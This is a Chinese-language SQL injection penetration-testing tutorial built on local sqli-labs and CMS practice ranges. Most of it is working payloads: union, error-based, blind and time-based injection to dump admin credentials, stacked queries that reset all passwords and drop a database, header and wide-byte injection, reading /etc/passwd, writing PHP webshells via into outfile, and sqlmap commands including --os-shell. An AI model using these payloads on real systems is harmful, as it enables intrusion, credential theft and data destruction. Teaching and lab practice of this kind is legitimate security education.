过期的秋刀鱼-

渗透测试漏洞原理之---【SQL注入】

文章目录

1、SQL注入原理
- - 1.1、SQL注入原理
  - 1.2、SQL注入危害
  - 1.3、SQL注入分类
  - 1.4、SQL注入漏洞挖掘
  - - 1.4.1、注入点判断
    - 1.4.2、主要关注的问题
    - 1.4.3、sql-lib靶场第一关注入点
  - 1.5、知识补充
2、SQL注入基本手法
- - 2.1、联合查询
  - - 判断注入类型
    - 判断列数
    - 判断显示位
    - 数据库中的敏感信息
    - 获取管理员账号密码
  - 2.2、报错注入
  - - group by
    - extractvalue
    - updatexml
    - 案例演示
  - 2.3、布尔盲注
  - - 爆破数据库名
    - 获取库名长度
    - 按位获取数据库名
    - 案例演示
    - - 1、确认闭合
      - 2、判断数据库名的长度
      - 3、按位获取数据库名
  - 2.4、延时注入
  - - 数据库名的长度
    - 数据库名字
    - 案例演示
    - - 1、构造闭合
      - 2、获取版本号长度
      - 3、获取数据库版本号
  - 2.5、堆叠查询
  - - 案例演示
    - - 1、以sqli-labs第38关为例，修改所有用户密码为654321
      - 2、利用堆叠查询删库
      - 3、恢复sqli-labs 环境
3、SQL注入其他情况
- - 3.1、宽字节注入
  - - 3.1.1、代码分析
    - 3.1.2、GBK编码
    - 3.1.3、宽字节注入
    - - 获取数据库名
      - 获取表名
      - 获取字段
      - 获取数据
  - 3.2、HTTP头部注入
  - - 3.2.1、Cookie注入
    - - 获取数据库名称
      - 获取表名
      - 获取字段
      - 获取数据
    - 3.2.2、base64注入
    - - 判断注入类型
      - 获取数据库名
    - 3.2.3、User-Agent注入
    - - 构造闭合
      - 获取数据库
    - 3.2.4、Referer注入
    - - 构造闭合
      - 获取数据库密
4、SQL注入读写文件
- - 4.1、前提交件
  - - 4.1.1、权限问题
    - 4.1.2、文件路径
    - - 4.1.3、安全选项
  - 4.2、读写文件
  - - 4.2.1、读取文件
    - 4.2.2、写入文件
5、SQL注入工具
- - 5.1、sqlmap
  - - 5.1.1、安装与更新
    - 5.1.2、使用参数
    - 5.1.3、sqlmap实操
    - 5.1.4、POSR注入
    - 5.1.5、GetShell
6、SQL注入漏洞防御
- 现行很多开发框架，基本上已经从技术上，解决SQL 注入问题。

环境：

SQli-Labs-github下载地址

cms靶场环境链接百度网盘提取码：xcuw

phpstudy集成环境下载,下载后选择php版本为5.3.29，尽量低版本

1、SQL注入原理

1.1、SQL注入原理

SQL注入(SQL Injection)是一种常见的Web安全漏洞。攻击者利用这个漏洞，可以增删改查数据库中数据，或者利用潜在的数据库漏洞进行攻击。

增删改查

读写文件

提权

SQL注入的攻击行为可以描述为通过==用户可控参数==中注入SQL语法，破坏原有SQL结构，达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两个原因叠加造成的：

程序员在处理程序和数据库交互时，使用字符串拼接的方式构造SQL语句。
未对用户可控参数进行足够的过滤，便将参数内容拼接到SQL语句中。

总结起来就是四个字：拼接,未过滤

1.2、SQL注入危害

攻击者可以利用SQL注入漏洞，可以获取数据库中的多种信息，例如，后台管理账密，从而脱取数据库中的内容（脱库）。
在特别的情况下还可以插入内容到数据库、删除数据库中的内容或者修改数据库内容。
如果数据库权限分配存在问题，或者数据库本身存在缺陷，攻击者可以利用SQL注入漏洞直接获取WebShell或者服务器权限。

1.3、SQL注入分类

根据不同的标准，SQL注入漏洞可以有不同的分类

两大基本类型	五大基本手法	提交参数方式	注入点的位置
数字型字符型	联合查询报错注入布尔盲注延时注入堆叠查询	GET注入 POST注入 Cookie注入 HTTP头部注入	URL注入搜索框注入留言板注入登录框注入

五大注入手法从上到下，注入成本会也来越高，意思就是说联合查询最简单，堆叠查询最复杂

1.4、SQL注入漏洞挖掘

1.4.1、注入点判断

在疑似是注入点的地方或者参数后面尝试提交数据，从而进行判断是否存在SQL注入漏洞

测试数据	测试判断
-1或者+1	能否回显上一个或者下一个页面（判断是否有回显）
’ 或者"	是否显示数据库错误信息；根据回显内容可以判断是字符型还是数字型
and 1=1 and 1=2	回显的页面是否不同（布尔类型的状态）
and sleep(5)	判断页面的返回时间
\	判断转义

1.4.2、主要关注的问题

关注的问题	说明
回显	数据库中的内容是否会回显在网页中
数据库报错	数据库报错信息是否会回显在网页中提交的数据是字符型还是数字型，如果是字符型数据，那么闭合方式是什么呢？
布尔类型状态	显示的页面不同，形成对比页面正常或者不正常
延时	让数据库沉睡相应的秒数

1.4.3、sql-lib靶场第一关注入点

查看是否有回显

http://127.0.0.1/sqli/Less-1/?id=1
http://127.0.0.1/sqli/Less-1/?id=2
http://127.0.0.1/sqli/Less-1/?id=3

判断是否报错

http://127.0.0.1/sqli/Less-1/?id=3'

报错显示 ''3'' LIMIT 0,1'
说明存在字符型注入

判断是否存在布尔类型

http://127.0.0.1/sqli/Less-1/?id=3'+and+1=1--+
#有回显

http://127.0.0.1/sqli/Less-1/?id=3'+and+1=2--+

#页面异常

判断是否有延时

http://127.0.0.1/sqli/Less-1/?id=3'+and+sleep(5)--+

#有延时

1.5、知识补充

MySQL数据库中的注释

MySQL中的注释	URL的表现
减减空格 [-- ]	–+
井号 #	%23
内联注释 /* */

SQL注入流程

库--->表--->字段--->数据

可以代替空格的字符

%0A %0B %0D %A0

?id=1'%0Aand%0A1=1%23
?id=1'%0Band%0B1=1%23
?id=1'%0Dand%0D1=1%23
?id=1'%A0and%A01=1%23

2、SQL注入基本手法

2.1、联合查询

适用数据库中的内容在页面中有回显的情况。联合查询就是利用union select语句，该语句会同时执行两条select语句，实现跨库、跨表查询。

前提条件

两条select语句查询结果列数相同
对应列的数据类型相同（特殊情况下，条件被放松）

mysql> select 1,2,3 union select 8,7,6,5;  #--列数必须相同，否则报错
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select 1,2,3 union select 8,7,6;    #--列数相同
+---+---+---+
| 1 | 2 | 3 |
+---+---+---+
| 1 | 2 | 3 |
| 8 | 7 | 6 |
+---+---+---+
2 rows in set (0.01 sec)

mysql>

判断注入类型

?id=1
?id=2
?id=1'

注入类型判断：

我们在地址栏输入的是1’

而报错信息返回的是

判断列数

联合查询第二步，判断字段的个数，保证union前后两个select语句列数相同

?id=1' order by 4 --+  报错
?id=1' order by 3 --+  正常

# 当前select语句有 3列

?id=1'  union select 1,2,3

判断显示位

把第一条select语句置为假

?id=1' and 1=2 union select 1,2,3 --+
?id=-1'  union select 1,2,3 --+

数据库中的敏感信息

?id=1' and 1=2 union select 1,database(),3 --+
?id=1' and 1=2 union select 1,version(),database() --+
?id=1' and 1=2 union select 1,user(),3 --+
?id=1' and 1=2 union select 1,current_user(),version() --+
?id=1' and 1=2 union select 1,@@datadir,3 --+

获取管理员账号密码

1、先获取数据库名

?id=1' and 1=2 union select 1,database(),3 --+

2、获取所有表名

?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

3、获取字段

?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

4、获取数据

方法一：

group_concat函数用法理解

?id=1' and 1=2 union select 1,group_concat(username),group_concat(password) from users --+

方法二：

concat_ws将多个字符串连接成一个字符串，第一个参数指定分隔符，分隔符不能为null，如果为null，则返回结果为null

0x3a 是冒号的十六进制表示

?id=1' and 1=2 union select 1,2,group_concat(concat_ws(0x3a,username,password))from users --+

方式三：

concat()函数用于将两个字符串连接起来，形成一个单一的字符串

?id=1' and 1=2 union select 1,2,group_concat(concat(username,0x3a,password))from users --+

2.2、报错注入

在注入点的判断过程中，发现数据库中SQL 语句的报错信息，会显示在页面中，因此可以利用报错信息进行注入。

报错注入的原理，在错误信息中执行SQL 语句。触发报错的方式有很多，具体细节也不尽相同。此处建议直接背公式，将公式带换掉1=1的部分。

下面是三种不同的方法，使用哪个进行报错注入都

group by

?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from
information_schema.tables group by x)a)



?id=33 and (select 1 from (select count(*),concat(0x5e,(select password from cms_users limit
0,1),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)

extractvalue

?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))



?id=33 and extractvalue(1,concat(0x5e,substr((select password from cms_users),17,32),0x5e))

updatexml

?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)



?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users),0x5e),1)

?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)

案例演示

通过报错注入方法，获取网站后台管理员账密码

(1)判断注入类型

?id=33'

确定注入类型为数字型

（2）获取数据库

?id=33 and extractvalue(1,concat(0x5e,database(),0x5e))

(3)获取数据表

发现报错，查询的内容超过了一行

可以使用count()函数来看看有多少个表

?id=33 and extractvalue(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema='cms' ),0x5e))

发现有8张表，然后通过limit一次返回一个数据来获取想要的数据

?id=33 and extractvalue(1,concat(0x5e,(select table_name from information_schema.tables where table_schema='cms' limit 0,1 ),0x5e))

直到limit 7,1的时候，看到用户表cms_users

?id=33 and extractvalue(1,concat(0x5e,(select table_name from information_schema.tables where table_schema='cms' limit 7,1 ),0x5e))

(4) 获取字段

直接获取字段名也会报错，可以通过count函数查看有多少个字段

?id=33 and extractvalue(1,concat(0x5e,(select count(*) from information_schema.columns where table_schema='cms'  and table_name='cms_users'),0x5e))

发现有3个字段，然后通过limit一次返回一个数据来获取想要的数据

?id=33 and extractvalue(1,concat(0x5e,(select column_name from information_schema.columns where table_schema='cms'  and table_name='cms_users' limit 1,1),0x5e))

?id=33 and extractvalue(1,concat(0x5e,(select column_name from information_schema.columns where table_schema='cms'  and table_name='cms_users' limit 2,1),0x5e))

(5)获取数据

用户名

?id=33 and extractvalue(1,concat(0x5e,(select username from cms_users ),0x5e))

密码

获取密码发现直接获取密码得到的数据并不全

?id=33 and extractvalue(1,concat(0x5e,(select password from cms_users ),0x5e))

可以通过length函数查看密码的长度

?id=33 and extractvalue(1,concat(0x5e,(select length(password) from cms_users ),0x5e))

再利用substr函数获取密码

1、先得到前半段密码

?id=33 and extractvalue(1,concat(0x5e,(select substr(password,1,16) from cms_users ),0x5e)) 


e10adc3949ba59ab

2、再得到后半段密码

?id=33 and extractvalue(1,concat(0x5e,(select substr(password,17,32) from cms_users ),0x5e)) 

be56e057f20f883e

3、拼接两段密码，得到完整密码

e10adc3949ba59abbe56e057f20f883e

MD5解密

得到密码为123456

2.3、布尔盲注

页面中有布尔类型的状态，可以根据布尔类型状态，对数据库中的内容进行判断

爆破数据库名

http://127.0.0.1/sqli/Less-8/?id=1' and database() ='xxx' --+

#不知道数据库名有多少位
#不知道数据库的字符集合
#爆破成本高

获取库名长度

ascii码对照表

http://127.0.0.1/sqli/Less-8/?id=2' and length(database())=8 --+
# 页面正常，说明数据库名字的长度是8

按位获取数据库名

# 第一位
http://127.0.0.1/sqli/Less-8/?id=2' and ascii(substr(database(),1,1))=115 --+

#115
#s

http://127.0.0.1/sqli/Less-8/?id=2' and ascii(substr(database(),2,1))=101 --+
# 101
# e

# 第三位

案例演示

以sqli-labs第8关为例，通过布尔盲注，获取数据库名字

1、确认闭合

?id=1"

?id=1'

1'的时候页面没有显示

2、判断数据库名的长度

?id=1' and length(database)>10 --+       页面没显示
?id=1' and length(database)>9 --+        页面没显示
?id=1' and length(database)>8 --+        页面没显示
?id=1' and length(database)>7 --+        页面正常
?id=1' and length(database())=8 --+      页面正常

数据库长度是8

3、按位获取数据库名

第一位：

?id=1' and ascii(substr((select database()),1,1))>90 --+    正常
?id=1' and ascii(substr((select database()),1,1))>110 --+   正常
?id=1' and ascii(substr((select database()),1,1))>115 --+   没显示

?id=1' and ascii(substr((select database()),1,1))>114 --+   正常

?id=1' and ascii(substr((select database()),1,1))=115 --+  正常

ascii对照表

对照ascii码表得知115对应小写s,那就得到了数据库的第一个字母s

第二位：

?id=1' and ascii(substr((select database()),2,1))>100 --+   正常显示
?id=1' and ascii(substr((select database()),2,1))>110 --+  页面没显示
?id=1' and ascii(substr((select database()),2,1))>108 --+  页面没显示
?id=1' and ascii(substr((select database()),2,1))>106 --+  页面没显示
?id=1' and ascii(substr((select database()),2,1))>102 --+  页面没显示
?id=1' and ascii(substr((select database()),2,1))>101 --+  页面没显示
?id=1' and ascii(substr((select database()),2,1))>100 --+   正常显示
?id=1' and ascii(substr((select database()),2,1))=101 --+   正常

第二个位置为e

第三个位置：

?id=1' and ascii(substr((select database()),3,1))>96--+  正常显示
?id=1' and ascii(substr((select database()),3,1))>98--+  正常显示
?id=1' and ascii(substr((select database()),3,1))>99--+  页面没显示
?id=1' and ascii(substr((select database()),3,1))=99--+  正常显示

第三个字母是c

第四个位置

?id=1' and ascii(substr((select database()),4,1))>116--+    正常显示
?id=1' and ascii(substr((select database()),4,1))>117--+   页面没显示
?id=1' and ascii(substr((select database()),4,1))=117--+   正常显示

第四个字母为u

第五个位置：

?id=1' and ascii(substr((select database()),5,1))>113--+   正常显示
?id=1' and ascii(substr((select database()),5,1))>114--+   页面没显示
?id=1' and ascii(substr((select database()),5,1))=114--+   正常显示

第五个字母为r

第六个位置：

?id=1' and ascii(substr((select database()),6,1))>104--+  正常显示
?id=1' and ascii(substr((select database()),6,1))>105--+  页面没显示
?id=1' and ascii(substr((select database()),6,1))=105--+  正常显示

第六个字母为i

第七个位置：

?id=1' and ascii(substr((select database()),7,1))>105--+  正常显示
?id=1' and ascii(substr((select database()),7,1))>116--+  页面没显示
?id=1' and ascii(substr((select database()),7,1))=116--+  正常显示

第七个字母为t

第八个位置

?id=1' and ascii(substr((select database()),8,1))>122--+   页面没显示
?id=1' and ascii(substr((select database()),8,1))>120--+   正常显示
?id=1' and ascii(substr((select database()),8,1))>121--+   页面没显示
?id=1' and ascii(substr((select database()),8,1))=121--+   正常显示

第八个字母为y

所以得到数据库名字为==security==

2.4、延时注入

利用sleep() 语句的延时性，以时间线作为判断条件

if用法：

if()语句有三个参数（表达式，表达式成立返回值，表达式不成立返回值）

if(1=2,1,2) 1=1这个表达式不成立，所以返回2

if(database()=‘security’,true,false) 如果数据库等于security，那么返回true

数据库名的长度

http://127.0.0.1/sqli/Less-9/?id=2' and if(length(database())>1,sleep(5),1) --+

# 页面有延时

数据库名字

http://127.0.0.1/sqli/Less-9/?id=2' and if(substr(database(),3,1)='c',sleep(5),1) --+

# 115 101  99
# s    e   c

案例演示

以sqli-labs第九关为例子，通过延时注入，获取数据库版本号。

1、构造闭合

?id=1' 
?id=1' and 1=1
?id=1' and 1=2
?id=1"

发现怎么构造闭合，页面都不发生变化

2、获取版本号长度

?id=1' and if(length((select version()))>15,sleep(5),1) --+   页面不延时
?id=1' and if(length((select version()))>7,sleep(5),1) --+   页面不延时
?id=1' and if(length((select version()))>5,sleep(5),1) --+    页面发生延时
?id=1' and if(length((select version()))=6,sleep(5),1) --+   页面发生延时

说明数据库版本号的长度为6

3、获取数据库版本号

获取版本号，根据自己phpstudy中数据库的版本来看，最后得到的版本结果不一定跟我这个一致，结合自己的环境版本来看

第一位：

?id=1' and if(substr((select version()),1,1)=5,sleep(5),1) --+  页面发生延时

第二位:

?id=1' and if(substr((select version()),2,1)='.',sleep(5),1) --+

第三位:

?id=1' and if(substr((select version()),3,1)=3,sleep(5),1) --+ 页面不延时
?id=1' and if(substr((select version()),3,1)=7,sleep(5),1) --+  页面延时

第四位:

?id=1' and if(substr((select version()),4,1)='.',sleep(5),1) --+ 页面延时

第五位

?id=1' and if(substr((select version()),5,1)=2,sleep(5),1) --+  页面延时

第六位

?id=1' and if(substr((select version()),6,1)=6,sleep(5),1) --+ 页面延时

得到数据库版本号为5.7.26

2.5、堆叠查询

一次HTTP 请求，可以同时执行多条SQL 语句，包括增删改查操作。

以sqli-labs靶场环境的第38关为例

#更改users表所有的密码为654321
?id=1' ;update users set password='654321' --+

案例演示

1、以sqli-labs第38关为例，修改所有用户密码为654321

构造闭合

?id=1' --+

判断列数

?id=1' order by 4--+   报错
?id=1' order by 3--+    正常

判断显示位

?id=1' and 1=2  union select 1,2,3--+

获取数据库

?id=1' and 1=2  union select 1,database(),3--+

获取表名

?id=1' and 1=2  union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

获取字段

?id=1' and 1=2  union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

修改用户密码

?id=1' ;update users set password='654321' --+

验证

密码修改成功！

2、利用堆叠查询删库

?id=1';drop database security--+

3、恢复sqli-labs 环境

出现下面的情况，表示数据库安装成功

3、SQL注入其他情况

3.1、宽字节注入

宽字节注入准确来说不是注入手法，而是另外一种比较特殊的情况。宽字节注入的目的是绕过单双引号转义，以sqli-labs-32 关为例子。

输入?id=测试，观察页面变化

?id=1

页面正常回显

?id=1'

根据页面回显，发现1\' ，服务器会把单引号转义，单引号由原来的定义字符串的特殊字符被转义为普通字符。

315c27指的是十六进制的ascii

可以通过Python函数来查看一下十六进制的ascii

3.1.1、代码分析


//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash
    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash
      
    
    return $string;
}

// take the variables 
if(isset($_GET['id']))
{
$id=check_addslashes($_GET['id']);
//echo "The filtered request is :" .$id . "
";

//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

mysql_query("SET NAMES gbk");
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
?>

第8、9行：单双引号被转义，没有其他过滤
第28行：将与数据库交互的数据字符编码设置为了GBK

3.1.2、GBK编码

GBK编码，也叫双字节编码，两个字节作为一个汉字。GBK 编码范围[8140,FEFE]

假如说查询一下国这个字的GBK编码是多少,访问这个链接:GBK编码

国的GBK编码是B9FA

可以通过汉字字符集编码查询

5C在GBK编码的低位范围之内[40,FE]。在5C 之前添加一个字符[81,FE] 之间，该字符就会和5c 组成一个汉字，那么转义符号就会无效

一个汉字由两个字节组成，一个字节八位，825c有四个数，一个数占4位，82属于高位字节，

5c属于低位字节

宽字节也叫双字节

?id=1%81'

#在单引号前面加一个%81
# %81就代表着ascii为81的字符

字符型注入，单引号闭合

3.1.3、宽字节注入

获取数据库名

页面有报错那就用联合注入，用报错注入也可以

http://127.0.0.1/sqli/Less-32/?id=1%81' and 1=2 union select 1,version(),database()  --+

http://127.0.0.1/sqli/Less-32/?id=1%81' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

获取表名

http://127.0.0.1/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'  --+      报错

使用BurpSuite的Decoder工具，把security转成ascii十六进制

http://127.0.0.1/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+

得到数据表users

获取字段

先把 users进行编码，得出7573657273

http://127.0.0.1/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 --+

获取数据

http://127.0.0.1/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,group_concat(concat_ws(0x3a,username,password)) from users--+

3.2、HTTP头部注入

SQL注入点不只会出现在GET参数中，也会出现在POST参数中

向服务端传参的三大基本方法：GPC
    GET   		URL中
    POST		body中
    COOKIE		http请求头中

3.2.1、Cookie注入

注入点在Cookie 数据中，以sqli-labs第20关为例

两个输入框输入用户名dumb和密码dumb，

打开BurpSuite，刷新页面，查看数据包，发送到Repeater重发器

修改Cookie值，查看页面变化

Cookie: uname=Dumb'; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

得知注入类型为字符型

获取数据库名称

这里不能用 --+ 注释，–+GET方式，在浏览器地址栏里

这里需要用# 号注释

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select database()),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

获取表名

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database()),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd    报错

使用count函数查看有多少表

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

使用limit函数一个一个的查看想要的表名

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

得到users表

获取字段

同样需要查看有多少个字段

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

使用limit函数一个一个的查看想要的表名

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

得到username和password

获取数据

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select username from users ),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

发现报错，说明用户有很多，

Cookie: uname=Dumb'and updatexml(1,concat(0x7e,(select count(username) from users ),0x7e),1)#; PHPSESSID=mtp4dvf78spepp620ueoii2ekd

发现有13个用户

那么再往下的步骤都是一样的，使用limit一个一个得到

密码也是一样

3.2.2、base64注入

以sqli-labs第22关为例

登录框中输入用户名和密码

得到如下页面

使用bp查看数据包，发送到重发器

发现输入的用户名做了加密，%3D是等于号的url编码

使用bp的解码工具解码

假如说想用Dumb做登录，可以将它进行base64编码，得出RHVtYg==

放在Cookie里做提交

判断注入类型

Dumb'进行编码得到RHVtYic=

页面没有报错

使用Dumb"进行base64编码得到RHVtYiI=

页面报错，并且是双引号闭合，字符型注入

获取数据库名

使用Dumb" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#进行base64编码

RHVtYiIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSksMSkj

得到数据库名

3.2.3、User-Agent注入

注入的参数在User-Agent 中，以sqli-labs第18关为例子。

输入框输入用户密码，提交，如下页面

bp查看数据包

构造闭合

User-Agent:zs' and '1'='1

获取数据库

User-Agent:zs' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

3.2.4、Referer注入

注入参数在Referer 字段中，以sqli-labs第19关为例子。

跟上面一样，bp抓包修改Referer字段

构造闭合

Referer: zs'  and '1' ='1

获取数据库密

Referer: zs'  and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1' ='1

4、SQL注入读写文件

4.1、前提交件

4.1.1、权限问题

当前（连接）数据库的用户具有文件读写权限。数据库的权限粒度，某个库中某个表某个用户是否有增删改查权限。MySQL 数据库用户，例如root@localhost，由两部分组成：用户名@地址

?id=1 and 1=2 union select 1,file_priv,3 from mysql.user where user='root' and host='localhost'

4.1.2、文件路径

已知读写目标文件的绝对路径。

/var/www/
/var/www/html/
c:/phpstudy/www/

4.1.3、安全选项

MySQL 数据库有关于文件读写的安全选项secure_file_priv

secure_file_priv 参数限制了mysqld(MySQL DBMS) 的导入导出操作，这个选项是不能利用SQL 语句修改，必须修改my.ini 配置文件，并重启mysql 数据库。

show global variables like '%secure_file_priv%';

参数	说明
secure_file_priv=‘c:/a/’	会限制mysqld 的导入导出操作在某个固定目录下，并且子目录有效。
secure_file_priv=	不对mysqld 的导入导出操作做限制。
secure_file_priv=NULL	限制mysqld 不允许导入导出操作。

要想不对导入导出做限制，需要在mysql安装目录想my.ini中的[mysqld]下加入secure_file_priv= ，然后重启mysql服务

4.2、读写文件

4.2.1、读取文件

使用load_file() 函数。

and 1=2 union select 1,load_file("c:\\windows\\system32\\drivers\\etc\\hosts"),3

and 1=2 union select 1,load_file("c:/windows/system32/drivers/etc/hosts"),3

and 1=2 union select 1,load_file("/etc/passwd"),3

使用sql注入的方式造成了目录遍历

目录遍历：通过非正常方式访问到了web根目录以外的文件

4.2.2、写入文件

使用into outfile 语句。

and 1=2 union select 1,2,3 into outfile "c:/phpstudy_pro/www/1.php"

and 1=2 union select 1,"",3 into outfile "c:/phpstudy_pro/www/2.php"

and 1=2 union select 1,"",3 into outfile "/var/www/html/1.php"

and 1=2 union select 1,"",3 into outfile "/tmp/1.php"

Linux 系统下，一般情况下权限较低，无法写入文件

and 1=2 union select 1,"",3 into outfile "c:/2.php"

这种方式虽然成功写入到C盘根目录下，2.php，但是不能正常访问，只能通过查看页面源代码看到上传的php一句话木马

要想成功访问到我们上传的一句话木马，那么必须保证上传的一句话木马在Web服务的根目录下

可以通过一定的技术手段知道Web服务的路径

and 1=2 union select 1,"",3 into outfile "c:/software/phpstudy_pro/www/2.php"

这种上传方式就上传在了Web服务的根目录下，可以通过中国菜刀，中国蚁剑这种Webshell连接

5、SQL注入工具

5.1、sqlmap

SQLMap 是一款专注于SQLi 的工具，堪称神器。SQLmap 基于Python 语言编写的命令行工具，集成在Kali 中。

5.1.1、安装与更新

Kali 自带SQLMap

sudo apt-get update
sudo apt-get install sqlmap  如果安装了，那么就是更新

源码安装

git clone https://github.com/sqlmapproject/sqlmap.git

5.1.2、使用参数

-u	检测注入点
–dbs	列出所有的库名
–current-user	当前连接数据库用户的名字
–current-db	当前数据库的名字
-D “cms”	指定目标数据库为cms
–tables	列出数据库中所有的表名
-T “cms_users”	指定目标表名为’cms_users’
–columns	列出所有的字段名
-C ‘username,password’	指定目标字段
–dump	列出字段内容
-r	从文件中读取HTTP 请求
–os-shell	在特定情况下，可以直接获得目标系统Shell
–level 3	设置sqlmap 检测等级 3
–cookie=“username=admin”	携带Cookie 信息进行注入
-g	利用google 搜索引擎自动搜索注入点
–batch	使用默认选项
–random-agent	使用随机User-Agent 信息
-v 3	显示payload

5.1.3、sqlmap实操

利用sqlmap 注入得到cms 网站管理员账密

注入点：http://127.0.0.1/cms/show.php?id=33

python sqlmap.py  -u "http://127.0.0.1/cms/show.php?id=33"

python sqlmap.py -u "http://127.0.0.1/cms/show.php?id=33" --dbs --batch

python sqlmap.py -u "http://127.0.0.1/cms/show.php?id=33" --current-db

python sqlmap.py -u "http://127.0.0.1/cms/show.php?id=33" -D "cms" --tables

python sqlmap.py -u "http://127.0.0.1/cms/show.php?id=33" -D "cms" -T "cms_users" --columns

python sqlmap.py -u "http://127.0.0.1/cms/show.php?id=33" -D "cms" -T "cms_users" -C "username,password" --dump

5.1.4、POSR注入

sqlmap -r  post数据包的文件

以cms这个靶场环境为例，http://127.0.0.1/cms/admin/login.php

发送post请求，bp抓包

选择一个位置保存

然后使用sqlmap判断是否存在注入点

python sqlmap.py -r C:\\Users\zs\\Documents\\1.txt

5.1.5、GetShell

受到secure_file_priv 选项的限制
目标系统Web 根目录的绝对路径
目录权限

1	sqlmap -u "http://127.0.0.1/cms/show.php?id=32" --os-shell

6、SQL注入漏洞防御

避免采用拼接的方式构造SQL 语句，可以采用预编译等技术；对进入SQL 语句的参数进行足够过滤。

部署安全设备比如WAF。

现行很多开发框架，基本上已经从技术上，解决SQL 注入问题。

Pikachu靶场SQL注入

你可能感兴趣的:(#,渗透测试,sql,数据库,靶场)

为什么wal会提升数据库性能浩澜大大数据库
由于对于一个数据库内会存在很多张表，那么当数据库更新表数据时（1）直接写入磁盘实际写入的位置，会根据表的不同对应到不同的磁盘位置，在写入数据的时候，就会不停的寻找磁盘地址，找到地址后再去写入，对于机械硬盘来说，无规律的寻址是非常耗时的，对应SSD来说虽然性能提升很多，但是也会消耗时间；（2）先写入日志，在写入磁盘（WAL）WAL的过程，由于总是按照在文件末尾追加，只要找到文件写入位置，写入修改后，
Flink中的SQL Client和SQL Gateway BigDataMLApplication flink flink sql gateway
Flink中的SQLClient和SQLGateway对比目录定义基本原理适用场景主要区别常用运维命令示例官方链接正文1.定义SQLClient：FlinkSQLClient是一种用于提交和执行FlinkSQL语句的命令行界面或图形界面工具。SQLGateway：FlinkSQLGateway是一个独立的服务，它允许客户端通过RESTfulAPI将SQL查询提交到Flink集群。2.基本原理SQL
unblock with ‘mysqladmin flush-hosts‘ 解决方法祈祷平安,加油数据库常见问题 oracle 数据库
MySqlHostisblockedbecauseofmanyconnectionerrors;unblockwith'mysqladminflush-hosts'解决方法环境：linux，mysql5.5.21错误：Hostisblockedbecauseofmanyconnectionerrors;unblockwith'mysqladminflush-hosts'原因：同一个ip在短时间内产
通俗易懂：MySQL中如何设置只读实例并确保数据一致性？大龄下岗程序员 mysql java mysql spring
